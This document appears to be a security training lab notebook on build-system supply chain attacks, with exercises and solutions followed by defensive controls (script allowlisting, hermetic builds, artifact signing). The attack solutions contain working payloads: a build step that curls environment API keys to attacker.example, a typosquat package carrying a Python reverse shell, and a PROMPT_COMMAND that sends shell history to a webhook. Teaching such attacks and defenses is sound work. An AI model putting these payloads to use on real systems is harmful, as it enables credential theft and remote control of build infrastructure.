# Lab 2: Build System Compromise

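In this exercise, you'll learn about supply chain attacks that target build systems by implementing functions that demonstrate:
1. Build script injection
2. Dependency substitution
3. Build environment compromise

You'll then implement three defensive controls: build script verification, hermetic build environments, and artifact signing.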

We'll use a simulated build system to safely demonstrate these concepts.

## Setup

First, let's set up our classes and helper functions:

In [None]:
from dataclasses import dataclass
from typing import List, Dict, Optional, Set
import hashlib
import json
import subprocess
import sys
from pathlib import Path

@dataclass
class BuildScript:
    """Represents a build script with commands to execute"""
    commands: List[str]
    dependencies: List[str]
    
@dataclass
class BuildEnvironment:
    """Represents a build worker's environment"""
    env_vars: Dict[str, str]
    installed_packages: Set[str]
    
@dataclass
class BuildArtifact:
    """Represents the output of a build"""
    content: bytes
    metadata: Dict[str, str]
    hash: Optional[str] = None  # computed from content when not supplied
    
    def __post_init__(self):
        if self.hash is None:
            self.hash = hashlib.sha256(self.content).hexdigest()

@dataclass
class BuildSystem:
    """Represents our build infrastructure"""
    # None defaults are replaced with fresh dicts in __post_init__
    scripts: Optional[Dict[str, BuildScript]] = None
    environments: Optional[Dict[str, BuildEnvironment]] = None
    artifacts: Optional[Dict[str, BuildArtifact]] = None
    
    def __post_init__(self):
        if self.scripts is None:
            self.scripts = {}
        if self.environments is None:
            self.environments = {}
        if self.artifacts is None:
            self.artifacts = {}

# Create test build system
build_system = BuildSystem()
build_system.environments["worker-1"] = BuildEnvironment(
    env_vars={"PATH": "/usr/local/bin:/usr/bin", "PYTHONPATH": "/usr/local/lib"},
    installed_packages={"pip", "build-essential", "python3"}
)
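
`BuildArtifact` records a SHA-256 digest of its content when it is created. As a minimal sketch of how such a digest can later be used to detect tampering, the hypothetical helper below (`matches_pinned_digest` is not part of the lab's API) compares content against a digest recorded at build time:

```python
import hashlib
import hmac

def matches_pinned_digest(content: bytes, pinned_sha256: str) -> bool:
    """Return True if content hashes to the pinned hex digest."""
    actual = hashlib.sha256(content).hexdigest()
    # compare_digest performs a constant-time comparison of the two strings
    return hmac.compare_digest(actual, pinned_sha256.lower())

original = b"print('hello')"
# Digest recorded when the artifact was built (illustrative data)
pinned = hashlib.sha256(original).hexdigest()

print(matches_pinned_digest(original, pinned))
print(matches_pinned_digest(original + b"#", pinned))
```

A digest only detects changes if the pinned value itself is stored somewhere the attacker cannot modify, which is the gap that artifact signing addresses later in this lab.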

### Exercise 1: Build Script Injection

Your first task is to implement a build script injection attack. The build system accepts scripts
containing shell commands and executes them during the build. Your goal is to create a build
script that looks innocent but contains an injected command that exfiltrates sensitive data.

Tips:
- Build scripts often download dependencies and run tests
- Command injection can be hidden in seemingly innocent commands
- Build environments usually have access to sensitive data like API keys

In [None]:
def create_malicious_build_script(exfiltration_url: str) -> BuildScript:
    """
    Creates a build script that appears innocent but exfiltrates data
    
    Args:
        exfiltration_url: URL where stolen data should be sent
        
    Returns:
        BuildScript with hidden malicious commands
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
exfil_url = "https://attacker.example/collect"  # reserved example domain, never resolves
script = create_malicious_build_script(exfil_url)

# Script should look innocent
assert any("pip install" in cmd for cmd in script.commands), "Script should include dependency installation"
assert any("test" in cmd.lower() for cmd in script.commands), "Script should include tests"

# But contain hidden malicious commands
script_text = " ".join(script.commands)
assert exfil_url in script_text, "Script should include exfiltration URL"
assert "curl" in script_text or "wget" in script_text, "Script should include exfiltration method"

print("Malicious build script created successfully!")

<details>
<summary>Solution</summary>

```python
def create_malicious_build_script(exfiltration_url: str) -> BuildScript:
    # Create innocent-looking commands
    commands = [
        "pip install -r requirements.txt",
        "python -m pytest tests/",
        # Hidden command that sends API keys to attacker
        f"curl {exfiltration_url} -d \"$(env | grep API)\" || true",
        "echo 'Build completed successfully'"
    ]
    
    return BuildScript(
        commands=commands,
        dependencies=["pytest", "requests"]
    )
```
</details>


### Exercise 2: Dependency Substitution Attack

Next, implement a dependency substitution attack. The build system downloads dependencies
from a package repository. Your goal is to create a malicious package that can be 
substituted for a legitimate one.

Tips:
- Malicious package names are often similar to legitimate ones
- Build systems may fall back to alternative repositories
- A higher version number can cause a resolver to prefer the malicious package
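
From the defender's side, the first tip suggests a simple check: flag any requested package whose name is close to, but not exactly, a known package. The sketch below is one possible heuristic using the standard library's `difflib`; the function name `find_lookalike`, the `-` prefix rule, and the 0.8 threshold are assumptions chosen for illustration, not a vetted detection rule.

```python
from difflib import SequenceMatcher
from typing import Optional, Set

def find_lookalike(name: str, known_packages: Set[str], threshold: float = 0.8) -> Optional[str]:
    """Return the known package that `name` resembles, or None if nothing looks suspicious."""
    candidate = name.lower().replace("_", "-")
    if candidate in known_packages:
        return None  # exact match: this is the real package
    for known in sorted(known_packages):
        # Names such as "requests-utils" borrow a trusted name as a prefix
        if candidate.startswith(known + "-"):
            return known
        # Small edits such as swapped letters score a high similarity ratio
        if SequenceMatcher(None, candidate, known).ratio() >= threshold:
            return known
    return None

known = {"requests", "numpy"}
print(find_lookalike("requests-utils", known))
print(find_lookalike("reqeusts", known))
print(find_lookalike("flask", known))
```

A heuristic like this produces false positives for legitimate companion packages, so it is better suited to triggering a manual review than to blocking installs outright.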

In [None]:
@dataclass
class Package:
    """Represents a software package"""
    name: str
    version: str
    content: bytes
    metadata: Dict[str, str]

def create_malicious_package(target_package: str) -> Package:
    """
    Creates a malicious package masquerading as a legitimate one
    
    Args:
        target_package: Name of legitimate package to impersonate
        
    Returns:
        Package with malicious code but legitimate-looking metadata
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
target = "requests"
malicious = create_malicious_package(target)

# Package should look legitimate
assert malicious.name.lower().startswith(target.lower()), "Name should be similar to target"
assert "author" in malicious.metadata, "Should have author metadata"
assert "description" in malicious.metadata, "Should have description"

# But contain malicious code
assert b"import socket" in malicious.content or b"import subprocess" in malicious.content
print("Malicious package created successfully!")

<details>
<summary>Solution</summary>

```python
def create_malicious_package(target_package: str) -> Package:
    # Create similar package name
    name = f"{target_package}-utils"
    
    # Legitimate-looking metadata
    metadata = {
        "name": name,
        "version": "1.0.0",
        "author": "Python Package Index",
        "description": f"Utilities for {target_package}",
        "url": f"https://pypi.org/project/{name}"
    }
    
    # Malicious code that creates reverse shell
    content = f"""
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacker.example",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
""".encode()
    
    return Package(name, "1.0.0", content, metadata)
```
</details>

### Exercise 3: Build Environment Compromise

Finally, implement a build environment compromise attack. Build workers store credentials
and other sensitive data in environment variables and files. Your goal is to modify the
build environment to steal these secrets.

Tips:
- Build environments often contain API keys and tokens
- Environment variables can be modified or exported
- Sensitive files may be accessible to build scripts
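
These tips also point at the matching defense: do not hand secrets to build steps that do not need them. As a rough sketch, the hypothetical helper `scrub_env` below drops variables whose names look sensitive before an environment is passed to a build. The name pattern is an assumption and will miss secrets stored under unremarkable names.

```python
import re
from typing import Dict

# Name fragments that commonly indicate credentials (an illustrative list, not exhaustive)
SENSITIVE_NAME = re.compile(r"SECRET|TOKEN|PASSWORD|API_?KEY|CREDENTIAL", re.IGNORECASE)

def scrub_env(env_vars: Dict[str, str]) -> Dict[str, str]:
    """Return a copy of env_vars without variables whose names look sensitive."""
    return {name: value for name, value in env_vars.items()
            if not SENSITIVE_NAME.search(name)}

host_env = {
    "PATH": "/usr/bin",
    "AWS_SECRET_KEY": "secret123",
    "GITHUB_TOKEN": "ghp_123",
}
print(scrub_env(host_env))
```

An allowlist of variables the build is permitted to see is generally stricter than a denylist like this one; Exercise 4.2 takes that approach.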

In [None]:
def compromise_build_environment(env: BuildEnvironment) -> BuildEnvironment:
    """
    Modifies a build environment to exfiltrate secrets
    
    Args:
        env: The build environment to compromise
        
    Returns:
        Modified build environment that will exfiltrate secrets
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
clean_env = BuildEnvironment(
    env_vars={
        "PATH": "/usr/bin",
        "AWS_SECRET_KEY": "secret123",
        "GITHUB_TOKEN": "ghp_123"
    },
    installed_packages={"python3"}
)

compromised = compromise_build_environment(clean_env)

# Environment should still work
assert "PATH" in compromised.env_vars, "Should preserve PATH"
assert "python3" in compromised.installed_packages, "Should preserve basic packages"

# But include malicious modifications
assert any("WEBHOOK" in var or "EXFIL" in var for var in compromised.env_vars), "Should add exfiltration method"
assert compromised.env_vars != clean_env.env_vars, "Should modify environment"

print("Build environment compromised successfully!")

<details>
<summary>Solution</summary>

```python
def compromise_build_environment(env: BuildEnvironment) -> BuildEnvironment:
    # Create compromised environment
    new_env = BuildEnvironment(
        env_vars=env.env_vars.copy(),
        installed_packages=env.installed_packages.copy()
    )
    
    # Add exfiltration mechanisms
    new_env.env_vars.update({
        # Modify PATH to include malicious directory
        "PATH": "/tmp/malicious:" + new_env.env_vars["PATH"],
        # Add webhook for secret exfiltration
        "EXFIL_WEBHOOK": "https://attacker.example/collect",
        # Modify shells to log commands
        "PROMPT_COMMAND": "curl $EXFIL_WEBHOOK -d \"$(history)\""
    })
    
    # Install malicious packages
    new_env.installed_packages.add("malicious-logger")
    
    return new_env
```
</details>
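
A compromise of this kind changes the worker's environment, so comparing a worker against a known-good baseline can reveal it. The sketch below assumes such a baseline has been recorded; `diff_env` and the sample values are hypothetical and only illustrate the comparison.

```python
from typing import Dict, Set

def diff_env(baseline: Dict[str, str], observed: Dict[str, str]) -> Dict[str, Set[str]]:
    """Report variable names that were added, removed, or changed relative to the baseline."""
    shared = set(baseline) & set(observed)
    return {
        "added": set(observed) - set(baseline),
        "removed": set(baseline) - set(observed),
        "changed": {name for name in shared if baseline[name] != observed[name]},
    }

baseline = {"PATH": "/usr/bin", "CI": "true"}
observed = {
    "PATH": "/tmp/unknown:/usr/bin",                 # a directory was prepended
    "CI": "true",
    "EXTRA_HOOK": "https://collector.example/hook",  # unexpected new variable
}
drift = diff_env(baseline, observed)
print(drift)
```

Any non-empty `added` or `changed` set is a reason to quarantine the worker and rebuild it from a trusted image rather than trying to clean it in place.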

### Exercise 4: Implementing Build Security Controls

Now that we've seen various build system attacks, let's implement some key security controls.
You'll implement script verification, environment isolation, and artifact signing.

### Exercise 4.1: Build Script Verification

Build script verification is a critical control to prevent injection attacks. A proper verification system should:
* Check commands against an allowlist of permitted executables
* Verify all dependencies come from trusted sources
* Look for dangerous patterns like command injection characters
* Validate any environment variable references

Your function should implement these checks and err on the side of rejection: it is better to block a legitimate script than to let a malicious one through.

In [None]:
def verify_build_script(script: BuildScript, allowed_commands: Set[str], allowed_deps: Set[str]) -> bool:
    """
    Verifies a build script against security policy
    
    Args:
        script: The build script to verify
        allowed_commands: Set of allowed command executables (e.g. {"pip", "python"})
        allowed_deps: Set of allowed dependencies (e.g. {"pytest", "requests"})
        
    Returns:
        True if script is safe, False if it contains disallowed commands/deps
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
# Test command allowlist
safe_script = BuildScript(
    commands=["pip install pytest", "python -m pytest tests/"],
    dependencies=["pytest"]
)
bad_command_script = BuildScript(
    commands=["curl evil.example", "pip install pytest"],
    dependencies=["pytest"] 
)
allowed_commands = {"pip", "python", "pytest"}
allowed_deps = {"pytest", "requests"}

assert verify_build_script(safe_script, allowed_commands, allowed_deps)
assert not verify_build_script(bad_command_script, allowed_commands, allowed_deps)

# Test command injection protection
injection_script = BuildScript(
    commands=["pip install pytest; curl evil.example", "python tests.py"],
    dependencies=["pytest"]
)
assert not verify_build_script(injection_script, allowed_commands, allowed_deps)

# Test dependency verification
bad_dep_script = BuildScript(
    commands=["pip install pytest"],
    dependencies=["malicious-package"]
)
assert not verify_build_script(bad_dep_script, allowed_commands, allowed_deps)

print("Build script verification tests passed!")

<details>
<summary>Solution</summary>

```python
def verify_build_script(script: BuildScript, allowed_commands: Set[str], allowed_deps: Set[str]) -> bool:
    # Reject any dependency that is not explicitly allowlisted
    if not all(dep in allowed_deps for dep in script.dependencies):
        return False

    # Shell metacharacters that allow chaining, substitution, or redirection.
    # "$" also covers environment variable references, and newlines are
    # included because a shell treats them as command separators.
    forbidden_chars = set('|&;$()<>`\\"\'\n\r')
    # pip options that point installation at a different package source
    index_flags = ("--index-url", "--extra-index-url", "--find-links", "-i", "-f")

    for cmd in script.commands:
        # Split command and get base executable
        parts = cmd.split()
        if not parts:
            continue
        base_cmd = parts[0]

        # Check against command allowlist
        if base_cmd not in allowed_commands:
            return False

        # Look for command injection characters anywhere in the command
        if any(c in forbidden_chars for c in cmd):
            return False

        # Only allow pip to install from the default, approved source;
        # startswith also catches the "--index-url=<url>" form
        if base_cmd == "pip" and any(p.startswith(index_flags) for p in parts[1:]):
            return False

    return True
```
</details>
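
The allowlist check in this exercise treats the first whitespace-separated token as the executable. One way to tighten that step, sketched here under the assumption that commands follow POSIX shell quoting, is to tokenize with `shlex` and refuse path-qualified executables such as `/tmp/malicious/pip`, which would otherwise sidestep a name-based allowlist. `base_executable` is a hypothetical helper, not part of the lab's API.

```python
import shlex
from typing import Optional

def base_executable(cmd: str) -> Optional[str]:
    """Return the bare executable name of cmd, or None if the command should be rejected."""
    try:
        parts = shlex.split(cmd)
    except ValueError:
        return None  # unbalanced quotes: refuse rather than guess
    if not parts:
        return None  # empty command
    executable = parts[0]
    # Path-qualified executables bypass name-based allowlists, so reject them
    if "/" in executable or "\\" in executable:
        return None
    return executable

print(base_executable("pip install pytest"))
print(base_executable("/tmp/malicious/pip install pytest"))
print(base_executable("pip install 'unterminated"))
```

A caller would compare the returned name against `allowed_commands` and treat `None` as a failed verification.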

### Exercise 4.2: Hermetic Build Environment

A hermetic build environment is one that is completely isolated and reproducible. This means:
* All inputs are explicitly declared, with no access to the network or the host filesystem
* Build tools and dependencies are pinned to exact versions
* Environment variables are explicitly set, not inherited
* File system access is restricted to specific paths
* Each build gets a fresh environment

Implement a function that creates such an environment - this is similar to how container-based build systems work.
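
To make the "explicitly set, not inherited" point concrete, the sketch below launches a child process with an environment built from scratch and checks which variable names the child can see. It assumes a POSIX host where the Python interpreter starts with only `PATH` set; `visible_env_names` and the simulated secret are illustrative.

```python
import json
import os
import subprocess
import sys

def visible_env_names(env_vars):
    """Run a child Python process with exactly env_vars and return the names it sees."""
    result = subprocess.run(
        [sys.executable, "-c", "import json, os; print(json.dumps(sorted(os.environ)))"],
        env=env_vars,          # replaces the inherited environment instead of extending it
        capture_output=True,
        text=True,
        check=True,
    )
    return set(json.loads(result.stdout))

# Simulated secret in the parent process (illustrative value)
os.environ["AWS_SECRET_KEY"] = "secret123"

visible = visible_env_names({"PATH": "/usr/bin:/bin"})
print("AWS_SECRET_KEY" in visible)
```

Passing `env=` only controls environment variables. Network and filesystem isolation have to be enforced separately, for example by a container runtime or sandbox.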


In [None]:
@dataclass
class HermeticEnvironment(BuildEnvironment):
    """Extends BuildEnvironment with hermetic build controls"""
    allowed_paths: Set[str]
    input_files: Set[str]
    tool_versions: Dict[str, str]

def create_hermetic_environment(
    required_tools: Set[str],
    input_files: Set[str],
    build_path: str
) -> HermeticEnvironment:
    """
    Creates an isolated hermetic build environment
    
    Args:
        required_tools: Set of build tools needed (e.g. {"python", "gcc"})
        input_files: Set of input file paths that builds can access
        build_path: Path where build outputs should go
        
    Returns:
        HermeticEnvironment configured for secure builds
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
required_tools = {"python", "pip"}
input_files = {"/workspace/src/", "/workspace/requirements.txt"}
build_path = "/workspace/build"

env = create_hermetic_environment(required_tools, input_files, build_path)

# Should have minimal environment variables
assert "PATH" in env.env_vars
assert "PYTHONPATH" not in env.env_vars
assert all(not k.startswith("AWS_") for k in env.env_vars)

# Should have pinned tool versions 
assert all(t in env.tool_versions for t in required_tools)
assert all(v.count(".") >= 2 for v in env.tool_versions.values())  # Requires exact versions

# Should restrict file access
assert build_path in env.allowed_paths
assert not any(p == "/" for p in env.allowed_paths)
assert all(f in env.input_files for f in input_files)

print("Hermetic environment tests passed!")

<details>
<summary>Solution</summary>

```python
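def create_hermetic_environment(
    required_tools: Set[str],
    input_files: Set[str],
    build_path: str
) -> HermeticEnvironment:
    # Catalog of exact tool versions (illustrative values)
    pinned_versions = {
        "python": "3.9.7",
        "pip": "21.2.4",
        "gcc": "9.3.0",
        "make": "4.2.1"
    }

    # Fail closed if a requested tool has no pinned version
    unpinned = required_tools - set(pinned_versions)
    if unpinned:
        raise ValueError(f"No pinned version for: {sorted(unpinned)}")

    # Record versions only for the tools this build actually uses
    tool_versions = {tool: pinned_versions[tool] for tool in required_tools}

    # Build the environment from scratch; nothing is inherited from the host
    env_vars = {
        # Minimal PATH limited to the build toolchain
        "PATH": "/opt/build/bin",
        # Build-specific temp
        "TMPDIR": f"{build_path}/tmp",
        # No user config
        "HOME": "/opt/build/home",
        # Force deterministic build
        "SOURCE_DATE_EPOCH": "0",
        "PYTHONHASHSEED": "0"
    }
    # Note: environment variables cannot block network access. That must be
    # enforced by the sandbox or container running the build.

    # Restrict file access
    allowed_paths = {
        build_path,
        "/opt/build/bin",
        "/opt/build/lib",
        "/opt/build/include"
    }

    return HermeticEnvironment(
        env_vars=env_vars,
        # Copy the sets so later changes by the caller do not leak in
        installed_packages=set(required_tools),
        allowed_paths=allowed_paths,
        input_files=set(input_files),
        tool_versions=tool_versions
    )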
```
</details>

### Exercise 4.3: Artifact Signing & Verification

Build artifact signing ensures that artifacts haven't been tampered with between build and deployment.
A proper implementation should:
* Sign the artifact content and all metadata
* Use asymmetric cryptography (private key for signing, public for verification)
* Include build environment info in signed metadata
* Support key rotation and revocation

This is similar to how container signing works in systems like Docker Content Trust.
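
The rotation and revocation requirement can be pictured as a small registry of key IDs that verification consults before checking any signature. The `KeyRing` class below is a hypothetical sketch of that bookkeeping only; it stores no key material and is not how any particular signing system implements trust.

```python
from dataclasses import dataclass, field
from typing import Set

@dataclass
class KeyRing:
    """Tracks which signing key IDs are currently trusted."""
    trusted: Set[str] = field(default_factory=set)
    revoked: Set[str] = field(default_factory=set)

    def rotate(self, new_key_id: str) -> None:
        """Start trusting a new key; older keys stay valid until revoked."""
        if new_key_id in self.revoked:
            raise ValueError(f"{new_key_id} was revoked and cannot be reused")
        self.trusted.add(new_key_id)

    def revoke(self, key_id: str) -> None:
        """Permanently stop trusting a key, for example after a suspected leak."""
        self.trusted.discard(key_id)
        self.revoked.add(key_id)

    def is_trusted(self, key_id: str) -> bool:
        return key_id in self.trusted and key_id not in self.revoked

ring = KeyRing(trusted={"key-2022-01"})
ring.rotate("key-2022-02")   # new key introduced
ring.revoke("key-2022-01")   # old key retired
print(ring.is_trusted("key-2022-01"), ring.is_trusted("key-2022-02"))
```

In the exercise that follows, the `trusted_key_ids` argument plays the role of `ring.trusted`.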

In [None]:
@dataclass
class SignedArtifact(BuildArtifact):
    """Extends BuildArtifact with signature"""
    signature: Optional[bytes] = None
    signing_key_id: Optional[str] = None
    signature_metadata: Optional[Dict[str, str]] = None

def sign_build_artifact(
    artifact: BuildArtifact,
    private_key: bytes,
    key_id: str,
    build_env: BuildEnvironment
) -> SignedArtifact:
    """
    Signs a build artifact with build environment info
    
    Args:
        artifact: The artifact to sign
        private_key: Private key for signing
        key_id: ID of the signing key (for rotation/revocation)
        build_env: The environment that produced this artifact
        
    Returns:
        SignedArtifact with valid signature and metadata
    """
    # YOUR CODE HERE
    pass


def verify_artifact_signature(
    artifact: SignedArtifact,
    public_key: bytes,
    trusted_key_ids: Set[str]
) -> bool:
    """
    Verifies artifact signature and metadata
    
    Args:
        artifact: SignedArtifact to verify
        public_key: Public key for verification
        trusted_key_ids: Set of trusted signing key IDs
        
    Returns:
        True if signature is valid and key is trusted
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
artifact = BuildArtifact(
    content=b"test artifact",
    metadata={"version": "1.0.0"}
)
build_env = BuildEnvironment(
    env_vars={"PATH": "/usr/bin"},
    installed_packages={"python3"}
)
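# The reference solution simulates signing with HMAC, which is symmetric:
# signer and verifier must share one key. Real systems use a distinct key pair.
private_key = b"test-signing-key"
public_key = private_key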
key_id = "key-2022-01"

# Test signing
signed = sign_build_artifact(artifact, private_key, key_id, build_env)
assert signed.signature is not None
assert signed.signing_key_id == key_id
assert "build_env" in signed.signature_metadata

# Test verification
trusted_keys = {key_id}
assert verify_artifact_signature(signed, public_key, trusted_keys)

# Should reject untrusted keys
assert not verify_artifact_signature(signed, public_key, {"different-key"})

# Should reject modified artifacts
tampered = SignedArtifact(
    content=b"modified",
    metadata=signed.metadata,
    signature=signed.signature,
    signing_key_id=signed.signing_key_id,
    signature_metadata=signed.signature_metadata
)
assert not verify_artifact_signature(tampered, public_key, trusted_keys)

print("Artifact signing tests passed!")

<details>
<summary>Solution</summary>

```python
import hmac
from datetime import datetime, timezone

def sign_build_artifact(
    artifact: BuildArtifact,
    private_key: bytes,
    key_id: str,
    build_env: BuildEnvironment
) -> SignedArtifact:
    # Create signature metadata
    signature_metadata = {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        # Record variable names only; the values may contain secrets
        "build_env": json.dumps({
            "env_var_names": sorted(build_env.env_vars),
            "packages": sorted(build_env.installed_packages)
        }),
        "key_id": key_id
    }

    # Create message to sign; sort_keys gives a stable serialization
    message = b"".join([
        artifact.content,
        json.dumps(artifact.metadata, sort_keys=True).encode(),
        json.dumps(signature_metadata, sort_keys=True).encode()
    ])

    # HMAC stands in for a real signature scheme. It is symmetric, so the
    # verifier needs the same key; in practice, use asymmetric signatures.
    signature = hmac.new(private_key, message, hashlib.sha256).digest()

    return SignedArtifact(
        content=artifact.content,
        metadata=artifact.metadata,
        signature=signature,
        signing_key_id=key_id,
        signature_metadata=signature_metadata
    )

def verify_artifact_signature(
    artifact: SignedArtifact,
    public_key: bytes,
    trusted_key_ids: Set[str]
) -> bool:
    # Verify key is trusted
    if artifact.signing_key_id not in trusted_key_ids:
        return False

    # Reject unsigned artifacts and key IDs that differ from the signed one
    if artifact.signature is None or artifact.signature_metadata is None:
        return False
    if artifact.signature_metadata.get("key_id") != artifact.signing_key_id:
        return False

    # Recreate signed message exactly as the signer built it
    message = b"".join([
        artifact.content,
        json.dumps(artifact.metadata, sort_keys=True).encode(),
        json.dumps(artifact.signature_metadata, sort_keys=True).encode()
    ])

    # With HMAC, `public_key` must be the same bytes used for signing
    expected_sig = hmac.new(public_key, message, hashlib.sha256).digest()
    return hmac.compare_digest(artifact.signature, expected_sig)
```
</details>
